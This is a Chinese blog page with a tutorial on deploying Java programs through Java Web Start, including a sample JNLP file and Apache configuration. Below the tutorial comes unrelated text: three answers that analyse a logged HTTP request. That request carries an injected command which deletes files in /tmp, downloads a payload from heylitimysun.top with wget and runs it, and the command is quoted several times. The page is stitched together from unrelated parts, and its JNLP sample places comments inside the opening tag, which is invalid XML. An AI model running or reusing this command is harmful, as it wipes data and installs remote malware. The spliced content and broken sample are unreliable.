快速配置你的Java程序到JAWS(Java Web Start)(1)

一、JAWS(Java Web Start)简介
JAWS是一种新型的应用程序布署机制,它能让你在安装了JAWS插件的条件下,通过单击在Web浏览器上的链接就能安装你需要的软件。它是透明式的处理复杂的软件安装过程,它把软件隐藏在本地硬盘上,以便需要时能尽可能快的执行。不同的程序可以稳定的使用不同的JDK版本,你可以定制你的程序所使用的JDK版本,对于客户端,JAWS插件会负责在需要时下载最新的JRE(Java Runtime Edition)版本。
JAWS不需要你对你的程序进行任何特殊的修改以使你的程序能在JAWS机制上运行。但是,由于顾及安全的原因,JAWS会把你的程序放在一个称为沙箱(sandbox)的内部运行,就如一个Applet程序一样,对于进行了数字签名的程序,客户可以选择信任或不信任你的程序,如果选择信任,那你的程序就可以像本地的程序一样毫无阻碍的(相对而言)访问本地资源,比如文件系统、打印系统等。通过javax.jnlp包,不被信任的程序只能进行有限的系统访问。
JAWS是基于JNLP(Java Network Launching Protocol & API)的,JNLP是定义了底层抽象的基础技术,JAWS是它的一种实现。下面通过实例说明怎么配置你的Java程序来应用这种机制。
二、配置

JAWS程序是用Web服务器来配置,这并不是要求一个特殊的Web服务器,任何一个都可以,比如IIS、Apache等,不过你得修改你的Web配置使它知道application/x-java-jnlp-file MIME类型。下面按先后顺序来配置,客户端需事先安装好JAWS插件也即JRE。
1、打包JAR文件
你的程序代码和数据必需被打包到jar文件中,你可以通过JDK1.4提供的jar工具来创建一个打包的jar文件,如下面的例子:
jar cvf draw_applet.jar draw/*.class images/*.gif
假设当前目录为D:/javacode/draw/classes,这行命令会把当前目录中draw目录里的所有扩展名为class的文件和images目录里所有扩展名为gif的文件打包到draw_applet.jar文件中。当然你也可以把你的程序代码或数据分开打包为多个jar文件。当你的程序很大时,这样做就有明显的优点,那就是在程序开始执行前不用等所有jar文件都被下载到客户机上。缺省情况下,所有的jar文件都要被下载,但是你可以配置特殊的jar文件按需下载。也可以用JNLP API中的DownloadService来请求下载一个特殊的jar文件。对于需要访问客户端系统资源的程序,还需要用JDK提供的另一个工具jarsigner为其签名,以便让用户来信任你的程序。
2、建立JNLP文件
JNLP是一个JAWS程序起始执行位置。当用户在Web浏览器上点击一个对JNLP文件的链接时,浏览器会先下载这个JNLP文件,接着装有JAWS的客户端会根据这个文件的指示自动下载程序然后启动。其实JNLP文件就是一个XML文件,它的主要功能是列出程序的jar文件资源位置。一个JAWS程序第一次被运行时,会下载所有用到的jar文件。当服务器上的jar文件有变化时,客户端JAWS程序在下一次启动时会自动下载有改变的文件,这使得客户端的程序尽可能的保持最新。没有改动时程序会直接从客户端启动。
下面是一个JNLP文件的例子,此文件保存在我的电脑中d:/javacode/draw/classes目录中,你可以复制然后修改以适合你的JAWS程序:

<?xml version="1.0" encoding="GBK"?>
<jnlp
<!-- 文件兼容的JNLP版本-->
spec="1.0+"
<!-- 程序的绝对位置,其它的相对URL都相对于这个位置 -->
codebase="http://210.43.32.199/apple/"
<!-- 本文件的相对URL -->
href="Draw.jnlp">
<information>
<!-- 程序标题 -->
<title>画图</title>
<!-- 程序制作者 -->
<vendor>Kevin Ma</vendor>
<!-- 关于这个程序的更多信息的Web页,这个页的URL会被显示在JAWS的应用程序管理器上 -->
<homepage href="http://210.43.32.199/apple/drawpic.html/"/>
<!-- 下面元素会在JAWS上显示-->
<description>画图</description>
<description kind="short">
一个简单的画图软件
</description>
<!-- 指向一个jpg或gif文件的URL,它会被作为一个图标显示在JAWS的应用程序管理器中-->
<icon href="images/draw.gif"/>
<!--声明程序在被下载后,不用再访问服务器即可运行-->
<offline-allowed/>
</information>
<!--
<security>
请求给予足够的权限对本地机进行访问,这就要求所有的jar都要被签名。对于不访问本地机的程序,此项并非必需
<all-permissions/>
</security>
-->

<resources>
<!-- 指定程序支持的JRE版本。可以指定多个,会按优先顺序检查 -->
<j2se version="1.4"/>
<!-- 指定包含代码和数据的jar文件的相对URL。 -->
<jar href="draw_applet.jar"/>
<!-- 指定将被按需下载的jar文件
<jar href="lib/backgrounds.jar"/>
-->
</resources>
<!-- 指定程序的主类 -->
<application-desc main-class="draw.DrawPic"/>
</jnlp>
各项元素的含义不需再多加解释,需要说明的是,如果你注释掉<all-permissions/>,那就是说你声明你的程序是不被信任的,在运行时对本地机的访问也就受限。包含了它就意味着你的程序是受信的,可以访问本机,但这并不是说你就可以任意对本机进行访问,你的程序必需有数字签名并得到用户的许可才行。
3、配置Web服务器
在我的系统中我用的是Apache2.先停止它,然后打开Apache的配置文件httpd.conf,找到AddType添加如下一行:
AddType application/x-java-jnlp-file .jnlp
我的Java代码和所用的Html文件在D:/javacode/draw/pub目录中,还要在httpd.conf文件中添加一个别名项(在IIS中叫虚拟目录)指向它:
Alias /apple "D:/javaCode/draw/pub"
<Directory "D:/javaCode/draw/pub">
Options Indexes MultiViews
AddOutputFilter Includes html
AllowOverride None
Order allow,deny
Allow from all
</Directory>
保存此文件并重启Apache。接着为了方便再建立一个Html文件位于D:/javaCode/draw/pub中,此文件中列出了你的服务器上所有可用的JAWS程序,其样例如下:
<html>
  <head>
    <title>Remote Apps Webpage</title>
  </head>
  <body>
  <h1>Remote Apps Webpage</h1>
  <ul>
  <li><a href="Draw2.jnlp">画图</a>
  </ul>
  <hr>
  <address><a href="mailto:cnydpl@hotmail.com">Kevin Ma</a></address>
<!-- Created: Mon Nov 18 18:01:23 GMT 2003 -->
<!-- hhmts start -->
Created: Mon Nov 18 18:01:23 GMT 2003
<!-- hhmts end -->
</body>
</html>

这就完成了所有工作,此时,所有配置工作都基本完成,接着就是启动了。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
### 回答1: 这是一个使用 HTTP 方法 GET 的请求,目标主机为 127.0.0.1,目标资源的 URI 是 /shell?cd /tmp,其中 ?cd /tmp 可能是在 URI 中传递的查询参数,接下来的命令 rm -rf *、wget heylitimysun.top/jaws、sh /tmp/jaws 可能是在执行远程命令或者下载并执行恶意软件。但是,由于我无法访问网络,无法确定这些命令的具体含义。 ### 回答2: 这是一个针对网络主机的请求,使用的HTTP方法是GET。从请求中可以得知主机的IP地址是127.0.0.1,URI则是/shell。在URI中,包含了一系列命令用于操作主机。 首先,通过cd /tmp命令,更改当前的工作目录至/tmp目录下。 接着,执行rm -rf *命令,该命令会递归删除/tmp目录下的所有文件和子目录。这样的操作可能是为了清理/tmp目录。 接下来,使用wget命令下载文件,URL为heylitimysun.top/jaws,下载的目标路径为/tmp/jaws。 最后,执行sh /tmp/jaws命令,通过执行/tmp目录下的jaws文件来执行一些未知的操作。 总体而言,这个请求可能会对主机的/tmp目录进行清理,并下载并执行一个名为jaws的文件。根据具体情况来看,这个操作可能是有恶意的,因为它可能会对主机产生不可预测的影响,例如下载恶意软件或执行破坏性的命令。对于网络安全来说,我们应该保持警惕并防止此类请求对系统造成损害。 ### 回答3: 根据给定的请求信息解析如下: - method: GET (请求方法为GET,表示客户端想要获取服务器上的某个资源) - status_code: (状态码为空,通常状态码会根据服务器的处理结果返回给客户端,这里并未指定) - host: 127.0.0.1 (请求的主机地址为127.0.0.1,即本地主机) - uri: /shell?cd /tmp;rm -rf *;wget heylitimysun.top/jaws;sh /tmp/jaws (请求的URI路径为/shell,并附带了一些具体指令) 该请求的具体操作指令如下: 1. cd /tmp:切换当前目录到/tmp(临时目录)。 2. rm -rf *:递归删除当前目录中的所有文件和子文件夹。 3. wget heylitimysun.top/jaws:使用wget命令从heylitimysun.top/jaws下载文件。 4. sh /tmp/jaws:执行/tmp目录下的jaws文件。 根据以上指令来看,该请求的目的是在本地主机上执行一系列操作。具体操作内容包括切换至临时目录、删除临时目录中所有文件、从指定URL下载文件,并在临时目录下执行该文件。 需要注意的是,该请求可能存在安全风险,因为执行该请求的服务器可能受到恶意文件的下载和执行。在实际情况中,需要对这样的请求进行审查并加以防范。同时,作为用户,我们也需要谨慎对待类似的请求,避免误操作或受到恶意攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值